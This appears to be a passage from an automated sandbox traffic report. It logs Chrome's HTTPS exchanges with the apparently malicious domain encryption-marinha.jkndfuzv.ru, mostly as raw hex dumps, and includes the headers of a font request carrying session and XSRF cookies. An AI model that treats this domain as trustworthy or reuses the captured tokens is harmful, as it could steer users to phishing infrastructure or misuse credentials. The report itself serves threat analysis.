                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 35 11 09 23 e7 fa 68 14 48 a4 32 ac 7c 3c e8 31 a3 7a a7 a2 5d cf 78 5a f4 95 0f 7a 9d f0 7a b2 e4 97 57 f8 13 be d9 d9 8c a2 1d 9b a8 70 25 87 11 46 eb 65 fa 72 22 79 47 8c bc e1 0d 8b 92 c1 66 b3 4d 33 f2 5d 18 55 1b 70 f3 a0 b7 1c 8d 45 19 a1 3c 9d cb 3a e4 db 6a 81 9b 45 b7 f8 c1 e1 b0 ec a7 c9 b6 74 91 bb 98 ef 21 c7 16 ca bf a1 7e 61 b5 c0 03 4a fd 6d 98 ee 1c 94 66 e3 82 64 a7 65 45 ac c3 bb 3e d4 3a f4 39 85 0a fc c7 d9 99 2c 36 4b 7b e8 71 b2 15 36 65 b8 17 34 3a 7a b4 e5 d3 ff 7f d5 b4 7b ef 7b ef ff 0f 80 24 86 93 20 8a 94 9c 42 1a 83 d4 e6 39 3a 30 c6 47 0b 8d 36 e4 39 52 d3 b9 dc 14 bb 6d d7 a5 aa 6a 43 57 ac 6d 10 5d 3a 7b f7 70 e0 8f 3f 50 eb 4f 91 42 fa c8 45 cc b6 01 dd c4 75 9a 4a 9f 0a 5f a5 a0 ff a6 fa 1a f1 cc 13 08 64 64 3d cb 20 6c
                                                                  Data Ascii: 5#hH2|<1z]xZzzWp%Fer"yGfM3]UpE<:jEt!~aJmfdeE>:9,6K{q6e4:z{{$ B9:0G69RmjCWm]:{p?POBEuJ_dd= l
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 3a 74 eb b1 d7 7e 07 1c 72 8a dc a0 f3 2e bb ea 1a 85 5b be e1 b7 ae 45 16 a7 97 a6 97 a7 d7 a7 b7 df df f6 d1 c7 9f 7c fa d9 e7 5f 7c f9 d5 d7 df 7c db 5d f7 bd 64 0f 0c 27 26 a7 a6 47 33 b3 fb f6 1f 38 78 68 6e 71 69 79 65 75 6d fd e4 a9 b3 e3 8d 73 e7 af 5e bf 79 ef fe 83 87 8f b6 1e 3f f9 f3 9f 58 9a 82 86 1f 14 46 8a 40 1a 1b 7a 01 35 e4 a7 cb 42 c2 8c cb 67 c9 7e 38 c8 2a 82 f2 62 14 42 0d 1b 75 31 c1 78 4a 5e bf 2c 2b 6d 8b 27 04 9e 3e 6d e9 7b 86 76 fb 60 50 1b 34 94 88 22 33 51 bc a1 68 24 f2 32 83 65 61 3f 18 48 15 94 c8 55 27 f2 4b de c9 51 8a dc 48 4d a6 31 ea c4 68 65 e5 5d b1 81 46 26 93 b0 07 f7 31 7a 10 ab d2 82 1f 29 0c 97 2c 1d f4 28 5a 41 13 73 52 90 c2 af a0 ce 1d c8 91 f5 2a 07 8b 48 c9 1f 54 95 4a c4 b9 30 36 d5 68 9c d9 ac 1e 6f 6a
                                                                  Data Ascii: :t~r.[E|_||]d'&G38xhnqiyeums^y?XF@z5Bg~8*bBu1xJ^,+m'>m{v`P4"3Qh$2ea?HU'KQHM1he]F&1z),(ZAsR*HTJ06hoj
                                                                  2025-03-14 11:31:00 UTC274INData Raw: 4e a3 34 51 9c 16 3a d7 60 d3 dc 02 d4 08 82 04 d1 4f 32 e3 5a ab 72 dc 86 8f 14 96 37 de ad 0a aa 5f 21 4c 44 82 9a e7 f5 70 28 82 4f 23 f1 4c f0 1f 64 40 c9 5d ef 4e 34 73 9b 4f 1b c9 64 37 06 61 ef df 1b 02 4a c5 59 98 4b 0f 36 d0 5a 73 f5 66 c0 15 ed 9b ba b7 ff 63 21 49 05 47 7d 49 d8 17 b6 ee 07 ce d7 67 ec 43 6b 60 27 b7 64 26 32 b9 85 27 73 35 1c 97 af d5 11 87 28 82 6b db ba 8b 44 03 ea 74 51 f8 50 29 92 60 37 24 39 9a f2 78 10 00 7e 0c f8 fb af 87 98 f5 21 fa 03 f0 fe 0b c0 e7 1e 18 3f 20 9f 15 d5 73 9b e0 ea 0d c0 0a 55 22 1f d7 be 95 c7 07 d0 10 c0 9f 4b 7d 9f 65 ef 23 8a 59 c2 cf f6 39 45 cb af 3e 0e 84 bc 8b 2b 32 5e 84 60 79 e3 43 df da 81 bc 1f 6f ed af cd 01 69 36 13 85 22 36 87 26 df 8a bb 36 57 23 cd e1 00 6a 45 42 61 66 80 b9 f2 a8 ae
                                                                  Data Ascii: N4Q:`O2Zr7_!LDp(O#Ld@]N4sOd7aJYK6Zsfc!IG}IgCk`'d&2's5(kDtQP)`7$9x~!? sU"K}e#Y9E>+2^`yCoi6"6&6W#jEBaf
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: c9 53 28 31 2f f8 9a ee d5 63 81 ca 11 9a 97 35 26 9b 71 d5 5f 83 ce 81 84 1b 33 45 e8 72 ff bb db 61 b2 49 c7 62 6c c5 a6 d9 c4 24 54 6f a9 f8 67 66 5e 2d a1 d1 63 26 60 1a 48 83 94 f4 b2 0f 35 67 41 7e ac dc 54 0d 75 3b 17 3e 77 a3 da d3 6a 91 76 33 b7 01 3c e6 08 1e 8c 6e 81 34 f6 0e 04 df e5 03 cd 49 00 51 2d 42 08 48 12 94 54 1e 95 cd 77 5c 9d 12 d4 36 ce 37 13 be 9c 7d 74 5b 41 8e c0 00 2e 4f e4 a4 a6 1e e0 be 7d cc bd 50 2f 64 4e 3a 81 5d c8 fe 5d c3 7d 8e 8c 32 48 83 77 0d 90 7b 13 d2 57 6e b0 06 4d 75 68 c5 55 77 d5 35 f8 49 26 62 3d d6 a4 e2 ca 23 21 a6 56 a3 4f be 0e 7f 36 9d 5e 71 0c a3 03 92 78 3a c4 c9 65 66 ff 5b b5 c9 5d 7f 97 9a b0 d0 cb 2b a9 2b c6 f5 9c 64 17 83 0b ca ab 0c f2 a6 37 19 bb 54 19 0c 61 de e5 05 7e 1d dd 82 1b f9 eb e4 a2
                                                                  Data Ascii: S(1/c5&q_3EraIbl$Togf^-c&`H5gA~Tu;>wjv3<n4IQ-BHTw\67}t[A.O}P/dN:]]}2Hw{WnMuhUw5I&b=#!VO6^qx:ef[]++d7Ta~
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 83 01 08 b4 a9 61 4b d6 79 06 66 0a 61 45 d4 1d d2 15 c7 ed 0f 39 40 72 9e 46 cb 35 24 69 23 8c 95 9a c1 12 e4 49 43 12 83 9b b3 77 77 aa 36 c5 6e 2b 25 e7 ee 33 90 60 27 6e cf e1 10 79 2a 48 74 8e 2d 96 0c 1e 2f 8e 21 2a 51 01 6f 3a dd d9 21 eb 6b 30 cd 5a ff 09 46 6d d7 38 c2 04 fb 4d 62 bc dd 0e 0f 23 13 cc c8 5d 90 1b 33 dc 81 58 cb 9f 31 d9 cb 70 14 bd 46 7e dc b6 c8 23 df 40 bd 87 f9 83 a5 21 24 d1 29 d6 90 ee 58 87 3d 09 80 e0 6a bb c0 a0 88 c4 aa 19 91 8f b2 3a 86 a1 c7 51 94 8d 27 34 7e 93 6d 79 84 7f 22 72 18 a7 cd 70 05 69 e3 44 db f8 ff af 9e d4 85 b4 cd e2 18 d5 3f 96 c3 09 cf c6 e4 5c 6d 0a 06 af 81 a3 25 42 c5 20 cd b7 cb aa a1 25 e4 61 93 4d 79 d2 4c 04 ae d7 c0 67 c6 a8 b1 07 00 76 2c 87 64 92 61 c8 f2 82 94 2e 87 d9 21 19 8d f3 72 4e db
                                                                  Data Ascii: aKyfaE9@rF5$i#ICww6n+%3`'ny*Ht-/!*Qo:!k0ZFm8Mb#]3X1pF~#@!$)X=j:Q'4~my"rpiD?\m%B %aMyLgv,da.!rN
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: ac d5 73 5d f9 a6 eb fb f3 7c 99 a5 ff c9 fc 7b 1f 99 c4 4d 67 34 db b8 85 68 00 eb 95 0d b0 ed 9a a1 0c be 43 9e 79 ca 13 45 f3 e9 6c 2e bc 3d 60 4b 49 e0 18 c3 66 bd 73 44 04 5c f3 6d c0 b3 07 ce ae cc e6 31 db 93 f3 6c bf ac ec cc 71 75 de 9c f7 bf 15 eb e0 7e 48 ff fd e8 70 5f 94 c9 94 72 42 d1 01 99 88 67 08 03 b9 71 0a d7 bf 8d a3 75 da ae 3a b9 15 31 c9 ef 88 53 cb 00 81 81 8c 9a f8 51 19 ab d1 aa 83 25 60 21 77 9b cd fb 55 e0 cd 67 bf 4b 1a d6 82 d7 89 ec 04 00 58 23 21 bb 6d 36 82 f9 8a 2d e1 26 a5 61 bc c8 04 cc 05 ba 85 e5 2c 6d c3 f1 f3 38 00 35 ca 8a 94 b6 b9 45 01 63 8d f5 42 26 23 2b 8f 9e 00 a8 57 ae 4c 7a d7 ca b4 6a 9a 6e 68 45 cb 7a 73 ec ec ca 6a 1d 9c 93 ed e0 d0 ee f2 22 bb e4 a0 57 78 d2 d0 d0 81 98 be 92 68 36 2a 35 6b 19 7e a7 38
                                                                  Data Ascii: s]|{Mg4hCyEl.=`KIfsD\m1lqu~Hp_rBgqu:1SQ%`!wUgKX#!m6-&a,m85EcB&#+WLzjnhEzsj"Wxh6*5k~8
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 7f fa ec ba b7 35 14 5c 7e d1 4a b7 ee dc 51 78 6e fd 3e 89 84 1f dd 81 fc a5 c9 a0 97 29 76 de 70 39 03 52 d6 f1 72 56 62 75 ee 79 aa d8 b8 e1 be 07 1e 7a ec 89 e7 8e fa ec ab 6f be fb 9d f5 c2 93 93 30 58 2f fd 0c 32 4c 92 49 a7 ba f8 ea 93 0f b5 5d f3 5d bf 50 a2 87 26 7a c4 d8 05 b3 bd 34 c7 2b f3 bc 31 d7 6b 0b bc 63 e6 aa 95 3e 5a ea 5f cb fd 9f c4 45 4b fc 23 cb ff 47 b8 96 ac 23 fb eb 38 fc 8c 85 af b8 75 e1 79 03 d7 5b 98 b8 c4 dd 5e c3 fd c4 bb 2b 59 77 5f f3 fd 05 45 0f 85 b7 29 ba 15 d0 37 36 f5 56 d2 53 71 9f 74 80 7c 2b 6a a8 8a 41 ca 87 09 70 4e 7c 10 d3 48 b5 c1 ea 46 a9 1f cd 1a ca 3c 46 c3 38 b6 30 91 6e ca 9d a8 73 82 b6 68 5d 93 34 4f 16 ea 4b e5 09 46 a7 1b 53 97 6a 7a 86 a9 74 33 9a 33 f4 dd 17 ce 9f 8d 11 eb 17 13 fc ce e5 66 61 03
                                                                  Data Ascii: 5\~JQxn>)vp9RrVbuyzo0X/2LI]]P&z4+1kc>Z_EK#G#8uy[^+Yw_E)76VSqt|+jApN|HF<F80nsh]4OKFSjzt33fa
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 73 fa a6 93 03 68 60 d9 19 55 17 a4 8a 5b c7 e3 d3 2a f5 23 1e 4b be 4a 56 b7 e8 14 2c 4d 2d a6 15 97 db 2c 6a 77 f9 a7 f2 66 0e 33 4b d9 3c 2c 29 99 e0 85 46 67 cb c3 b4 65 c5 c3 07 bb aa 20 fe ae 28 c0 88 7a 64 30 63 38 aa 0a 2a 86 f0 14 ea d8 65 d8 3e 71 30 09 56 b1 a5 f9 b0 61 0f 2e 91 dd 11 85 6d 56 4d 05 03 d8 a0 b8 a6 41 d8 36 5c 0c 1b 00 6c 50 1a 62 0c 80 9b 7b 6b 74 d4 d0 09 15 a7 20 7f bd b2 0d 76 01 71 d6 df 77 8a 65 41 78 9a e0 f5 4b 20 21 68 28 a1 04 43 cc b3 da 4c c4 22 77 ea 2d 86 02 b7 12 c4 07 a7 6e 29 59 2e ed e5 5b 9c 19 24 53 e7 65 8d 02 f8 6b 73 ca d4 3d 31 2c 42 fd 94 37 14 8f 1b c6 ce 0a a6 4e 63 f7 b4 dc c9 ea 4b d7 22 b2 7d cb a9 96 d5 da ca 50 6b 69 5e 7f d7 75 c8 39 42 55 03 f2 3e 12 85 96 02 38 35 49 a6 80 15 1d 11 77 28 e7 e2
                                                                  Data Ascii: sh`U[*#KJV,M-,jwf3K<,)Fge (zd0c8*e>q0Va.mVMA6\lPb{kt vqweAxK !h(CL"w-n)Y.[$Seks=1,B7NcK"}Pki^u9BU>85Iw(
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: c5 00 21 83 60 01 fc 35 de bf 85 08 2c 98 0e 09 11 57 76 e4 20 2d 99 77 b1 26 d7 75 33 9e 75 32 8c 35 f2 06 34 c5 76 59 5e 93 84 3d 6e 0e b4 dd a1 7a cb b8 b3 48 ef 14 e3 f6 83 d2 f0 ce a6 aa fb dc cb 34 90 8f 85 ed 05 4d 33 d5 47 9e b1 d7 b9 41 01 66 74 34 04 d9 06 46 6c f0 52 68 84 cb c0 f8 47 82 59 07 ba 72 86 5b a1 7e 85 e0 29 36 cb 0a 91 45 d6 95 1d f1 57 0e 79 59 45 1b 21 22 ad c8 2c d2 a0 8d 80 7d 45 8e d8 06 2f a2 26 6d 27 e9 f0 07 62 5d 42 8e b9 0c 3b e3 23 94 ef fd b5 33 02 b3 cd a6 3c 99 f1 f6 84 a6 db 34 19 57 b5 92 7c e9 51 47 8c 7b 09 ee 9c 9c 39 3b b7 21 a8 05 e9 15 66 d0 8e 90 90 6b 92 7f 10 2d de 03 75 06 ca d0 20 71 ec b1 2c 2d d1 5c 51 3a a5 c3 64 5d fd f0 8e 61 4b 38 68 2c c9 64 fd 36 d4 2b 8d 9f 6d 59 11 8e 5b 9d 42 0c 7c 39 12 34 18
                                                                  Data Ascii: !`5,Wv -w&u3u254vY^=nzH4M3GAft4FlRhGYr[~)6EWyYE!",}E/&m'b]B;#3<4W|QG{9;!fk-u q,-\Q:d]aK8h,d6+mY[B|94


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  20192.168.2.449748104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:59 UTC1414OUTGET /GDSherpa-regular.woff HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  Origin: https://encryption-marinha.jkndfuzv.ru
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: font
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:00 UTC1165INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:00 GMT
                                                                  Content-Type: font/woff
                                                                  Content-Length: 36696
                                                                  Connection: close
                                                                  Content-Disposition: inline; filename="GDSherpa-regular.woff"
                                                                  cf-cache-status: MISS
                                                                  Last-Modified: Fri, 14 Mar 2025 11:31:00 GMT
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1w%2F%2Feg7YyMIa9s0pSwjtPeo54wL7Yjk0Z%2Fn%2F4%2Bdqf%2FUIzD7piwD382klEqSE7YcS%2BFdwyWviY2PJVc9RNaEL1B5hqVYohlGfT9gcG7AKMKVU9R%2F%2FukT5NMhJFp47"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Vary: Accept-Encoding
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=6799&min_rtt=4837&rtt_var=3112&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2324&delivery_rate=585405&cwnd=251&unsent_bytes=0&cid=36ea7d45000e6589&ts=191&x=0"
                                                                  Cache-Control: max-age=14400
                                                                  Server: cloudflare
                                                                  CF-RAY: 92037134be4a41e9-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1656&rtt_var=629&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1986&delivery_rate=1729857&cwnd=210&unsent_bytes=0&cid=b8abbdab3e4604b3&ts=528&x=0"
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 77 4f 46 46 00 01 00 00 00 00 8f 58 00 11 00 00 00 01 36 90 00 01 00 00 00 00 8e 30 00 00 01 28 00 00 02 97 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8e 28 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 18 99 00 00 5e 3e 80 e1 18 da 47 53 55 42 00 00 1a 1c 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c cc 00 00 00 46 00 00 00 60 68 60 7b 5a 63 6d 61 70 00 00 1d 14 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 87 b0 00 00 00 30 00 00 00 3c 28 d6 01 ad 66 70 67 6d 00 00 87 e0 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 87 a8 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 22 30 00 00 54 6c 00 00 a0 68 11 94 2e 2b 68 65 61 64 00 00 76 9c 00 00 00 34 00 00 00 36 1a bb 7d da 68 68 65 61 00 00 76 d0 00 00 00
                                                                  Data Ascii: wOFFX60(DSIG(GPOS^>GSUB3yOS/2F`h`{Zcmap<?+cvt 0<(fpgm?gaspglyf"0Tlh.+headv46}hheav
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 08 98 94 03 93 03 c0 64 bb c1 24 ac 26 69 0a 82 e3 36 16 41 35 03 54 7e 15 b5 cf e4 fd 68 b9 12 2d 7f a9 16 4a ab d5 68 b5 1a ad 96 41 7f f7 f2 52 50 ef 03 35 00 54 d1 b2 51 05 4e 95 81 53 69 90 0f 1f 70 f1 41 63 33 81 4b 0d 38 56 02 8a ac 33 5c 0b a0 fd ed ea 79 5c bf 00 0a d8 54 d8 09 0e 56 83 83 d5 a0 40 40 28 a0 75 62 26 25 83 8b bb d0 eb 4d 1e 2e 5a e0 62 00 f2 70 0f 5d 05 6b 71 16 30 b9 07 fd fe 09 9d 8b bb 3c b9 cb c3 5d 77 dc 05 a1 8f bb 79 89 07 d3 d5 94 0f ec ba 00 bb 0c 60 e7 53 63 c8 0f 2a f5 05 76 9b 41 a5 7c 50 a9 00 58 e6 82 4a 0d c0 b2 cc d6 5a 2d 67 94 a5 5e c4 79 12 f5 02 b6 7b 41 ad 9e a0 54 0f 60 3b 00 d8 9e 0f 7e 15 00 5b 1f 78 d5 4b bd 8e 72 b3 51 ef 02 d4 b3 90 fa 03 f3 1c 60 dc 1f 4f 7d e8 4f 2a 52 1a d2 58 2e 85 fd 98 c5 47 c0 bf
                                                                  Data Ascii: d$&i6A5T~h-JhARP5TQNSipAc3K8V3\y\TV@@(ub&%M.Zbp]kq0<]wy`Sc*vA|PXJZ-g^y{AT`;~[xKrQ`O}O*RX.G
                                                                  2025-03-14 11:31:00 UTC557INData Raw: 65 88 5a 63 0f f4 93 4f 22 9e 48 dc 91 29 96 c6 6a 35 37 d8 e2 99 a3 cf 81 84 ca 4c 58 3c 4c 10 b1 1d 69 3b 0d f9 a9 c2 e3 01 76 a4 02 7a 23 ba d1 74 85 85 2c f7 c8 cc 35 5e 0f 15 47 96 be 1d dc 1b b4 97 47 2c 73 50 7c fd df c3 31 a0 d3 60 9a d3 8e bc 67 b4 fa 66 42 7d 16 a2 de 06 5e 88 88 77 3e 6c 64 43 e7 12 0e e8 6a 98 df 40 bc f5 9a 6b 19 ad 96 65 dc 78 b9 95 3a 12 46 f7 5a 58 3c bf b1 d5 e1 38 f1 4c 3f ca 15 2f 64 45 c5 38 ce 39 39 71 92 03 6c 2d 60 6b 19 0c 2c 0f 5e 6d e1 4e 51 b8 27 4a 66 42 3a aa e5 ba e8 51 45 9c 03 b8 77 c8 c8 ab b5 7e 55 7d bd fc bf 3d dd 23 9a a6 bd e8 29 49 59 47 d1 55 6d 67 96 22 de 5a 12 3d 02 89 44 e8 ba 84 1d bb 7b 66 34 fa 76 04 dc a3 70 a8 87 ad 3c c9 cc 75 74 3e ae 56 d1 59 90 f1 26 ea 42 67 b8 25 4a 44 3f 2f b5 c7 e3
                                                                  Data Ascii: eZcO"H)j57LX<Li;vz#t,5^GG,sP|1`gfB}^w>ldCj@kex:FZX<8L?/dE899ql-`k,^mNQ'JfB:QEw~U}=#)IYGUmg"Z=D{f4vp<ut>VY&Bg%JD?/
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 99 5a 0e 2a e4 6a 4b 4b 0c 45 a6 42 ee f3 f4 8e 38 fa 6b 75 bc 1a 3e f5 b2 df 02 86 0b 79 32 8d a6 5b e8 07 b8 7e 87 37 1a 5d fd 39 cf 91 dc 37 79 1b 34 b8 1a 3e aa 94 4b e5 c9 4c f3 de 1e fe 00 bf 9f e1 b2 5b a2 e7 98 dc be ac ef bc 4a e8 19 e1 85 3b c5 fc 63 36 fd 3f 39 3a 10 37 f2 f9 43 fe 25 cf e7 67 f4 aa 92 8e 09 ec 88 cb d1 3f f8 d4 2f 78 07 e4 e7 59 de 27 33 7a 51 71 a4 ac 37 7c c9 f3 3a 00 45 9b e0 f7 6b 29 5b e6 e4 eb 78 b6 79 9c 1c d9 99 24 d6 27 e8 59 3b f3 99 f9 05 2b f1 d2 c0 c7 e0 9b 82 b2 d7 aa d6 8c c3 1b f5 0e 4a cf 4c 82 83 b1 89 86 cc 2c 49 c7 f0 4d 56 64 3e 23 ce b8 34 d4 96 47 4a c0 1c 9f 8f df e5 cd bc 08 e7 46 48 4a 19 62 c7 32 7b 4d 8f 27 ea 39 53 c8 f9 2e c8 fb 5e f8 a8 23 b2 9f 23 cc ab 0d ae 13 e5 b7 02 b1 e4 5e f3 64 25 c6 59
                                                                  Data Ascii: Z*jKKEB8ku>y2[~7]97y4>KL[J;c6?9:7C%g?/xY'3zQq7|:Ek)[xy$'Y;+JL,IMVd>#4GJFHJb2{M'9S.^##^d%Y
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: da c7 f6 4c 89 bb 07 27 e4 c5 58 c7 f6 26 16 73 ea 5b 01 1b f4 8d ec 73 d4 a3 6c a1 fb 09 ad 8d 11 1a 8a ad 30 d1 8d 6d 73 e2 e0 6e 41 27 65 0e cd 9e c1 94 1d 75 14 65 83 0e d9 96 5e f2 cb 44 47 4a 21 8f e5 b0 d2 da 4e 9f 7e 1c d9 64 c7 62 c6 9e 87 a5 c6 10 6c 66 7d 74 74 ed ec 19 8f 3f ef 6e 76 41 57 a3 b6 45 ad c7 f9 a0 48 9d eb 11 c2 46 8f 37 c2 7e d5 9f c6 d8 b1 07 de 7c 88 e7 f0 b3 12 07 54 bb b3 c0 9a 97 c9 e0 76 03 b4 79 0e a4 7d 2d f4 6b 83 fb 96 ec 64 6a ae 10 6a 96 1a 6c f9 14 34 ab dd 51 39 6c 42 b9 d8 28 8f 07 d2 31 9b 8c 25 6a 63 e3 19 89 16 43 32 a2 ac 89 1e 6d 7b e6 31 7c f1 f7 3a b4 90 97 c3 ed 7d 71 d3 6e 84 68 79 ca f8 dc f1 8a 13 b3 46 8f 64 ca 90 57 04 ab fe 26 a2 a8 50 fc 31 a1 ac 4e 26 47 7d ab d2 e0 91 b2 86 88 7e c1 3e ae 8b 79 fb
                                                                  Data Ascii: L'X&s[sl0msnA'eue^DGJ!N~dblf}tt?nvAWEHF7~|Tvy}-kdjjl4Q9lB(1%jcC2m{1|:}qnhyFdW&P1N&G}~>y
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: d1 10 1a 84 27 83 e9 6a c0 35 74 2d 46 93 fa 6a 88 fc 1b d1 0d f4 3d ba 91 1e 84 dd b8 09 b2 76 33 c6 ab 83 00 03 01 83 50 e6 41 94 1a 22 7d bd de c8 e6 35 28 31 0a bf 77 49 1a d8 26 0c 42 db 0e 0c 91 7a e3 c1 60 03 57 c7 81 6b 0c be d7 c9 18 38 f2 7c 48 2b 70 3d fa 73 83 f4 c9 81 1b 05 1e 6c 03 6e 32 70 b3 0b df 77 61 14 dd 42 b7 d2 50 1a 4d 23 c0 eb db e9 6e 1a 09 b8 0b f0 43 3c bb 1b f0 23 e4 17 d0 7d f4 53 fa 19 72 2e a7 fb e9 0a f0 7d 14 ca 8f 40 de 2d f8 1d 89 f3 48 f1 e3 77 e3 ad 3e 38 ff 18 ef f4 c6 59 d7 35 0a 69 b4 bc 3b 1a 4f 74 cd b7 b4 03 23 80 8f 03 a3 a5 9d 78 70 bb 01 8d f1 0f 5c 20 73 e7 f4 80 90 ec 7e 38 f0 a3 56 e0 c7 e8 e3 7d d2 4f 07 7e 26 30 b2 0d b8 df c0 03 2e 8c 72 e1 9b 3a 86 21 ce e9 26 ff 3e ac d3 30 c0 1d f4 8f 92 d2 69 00 75
                                                                  Data Ascii: 'j5t-Fj=v3PA"}5(1wI&Bz`Wk8|H+p=sln2pwaBPM#nC<#}Sr.}@-Hw>8Y5i;Ot#xp\ s~8V}O~&0.r:!&>0iu
                                                                  2025-03-14 11:31:00 UTC1290INData Raw: cc 71 73 74 f3 07 52 0a bf 59 d8 72 fe e5 30 9c e0 d8 cf c4 a2 c0 c0 30 19 24 c7 fc 82 2d 07 24 c7 c0 0c 00 28 b2 0c 93 00 00 78 da 8d 95 09 94 4e 65 1c c6 7f cf 9d 45 a1 6c 61 b2 5c 77 3e 4c a4 84 8c ad 45 cb 0c 2a 29 a4 42 34 4a cb 90 f6 4c 08 63 8b 12 c3 60 b4 20 23 86 66 d0 31 46 26 46 06 43 b6 2c 61 8c f5 fb be f6 68 9f 16 4b 66 fa cf 52 a7 3a 75 f4 9e f3 de f7 fe cf 7b ee bd cf b9 ff e7 f7 bc 40 08 65 b3 1e b2 2b 61 31 56 a9 b4 0e 0d 6b 62 6b 0a 89 84 53 8b ab 68 cf 0d f4 21 8e 78 06 31 9c 51 2c 65 05 d9 ac 55 3d 8d 52 b2 8e ea a4 0a 55 ec d4 75 da 3a bd 9d 0f 9c 63 21 39 21 b9 6e ac 3b c1 9d ee 2e 76 33 dc 15 ee 2a 77 83 bb d9 dd e7 1e 74 0b dd d3 5e 4d af 8e e7 7a 3e 2f ca 6b e9 75 f0 62 bc a5 de 0a 2f cb cb f6 d6 45 d6 8a f4 45 46 45 4e 8b 4c f6
                                                                  Data Ascii: qstRYr00$-$(xNeEla\w>LE*)B4JLc` #f1F&FC,ahKfR:u{@e+a1VkbkSh!x1Q,eU=RUu:c!9!n;.v3*wt^Mz>/kub/EEFENL
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: c6 dd 5c ed d6 db 76 5a 8d 26 9f 83 d6 d3 24 eb f0 48 ed b5 2c e8 6a 89 d0 dd 72 a0 8c ff be a5 ec 63 19 50 42 fd 24 96 ab 97 79 ac 5f b9 df e2 d4 d3 3c 77 f7 ef a7 1d ba 82 00 00 78 da d4 bd 79 5c 94 c7 fd 07 fe cc 3c cf b3 bb dc 2c 0b 2c 37 2c 0b ec 72 c8 b5 c0 72 09 2b ca 21 97 e2 c5 25 2a 97 5c 8a 8a 28 e2 ad 20 1e 68 bc af 18 35 c6 78 e5 34 51 73 36 26 69 92 26 69 da e6 68 9b 34 6d 9a 6f da a6 89 3d 6d da a4 4d 94 7d f8 7d 66 9e 67 1f 96 85 4d da fc 5e bf 3f 7e 69 71 61 f6 3d 33 9f f9 cc 67 3e f3 f9 cc 7c 66 86 c1 cc c3 0c c3 7e c6 de 64 58 46 c9 a8 6e f0 1c 66 70 72 bc 46 a7 d6 45 ab 75 ea 87 d9 9c 91 d7 f0 97 d6 b9 ec cd 91 82 62 36 79 e4 1d 86 61 10 d3 c9 34 a8 da b8 53 8c 8a 89 b1 e8 31 42 0c 2a 65 11 53 82 10 2a 86 af 11 33 9f a0 6a 01 88 2a d4
